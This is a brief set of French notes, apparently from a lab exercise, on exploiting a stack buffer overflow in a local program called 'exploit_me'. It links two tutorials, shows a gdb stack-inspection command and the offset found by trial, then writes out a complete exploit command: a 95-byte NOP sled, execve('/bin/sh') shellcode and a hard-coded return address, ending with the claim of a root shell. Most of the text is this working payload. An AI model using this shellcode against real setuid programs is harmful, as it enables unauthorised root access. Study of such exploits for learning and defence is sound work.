ici exemple d'attack de buffer overflow
    https://pointerless.wordpress.com/2012/02/26/strcpy-security-exploit-how-to-easily-buffer-overflow/

Le payload utilisé vient de cette adresse
    https://beta.hackndo.com/buffer-overflow/

Imprimer la chaine PLUS la stack, on cherche a changer le dernier. Apres plusieurs test >> le bon chiffre est 95
x/40xw $esp


On charge le payload

./exploit_me `perl -e 'print "\x90"x95 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff" . "/bin/sh" . "\x40\xf6\xff\xbf"'`

Tada : nouveau terminal en root
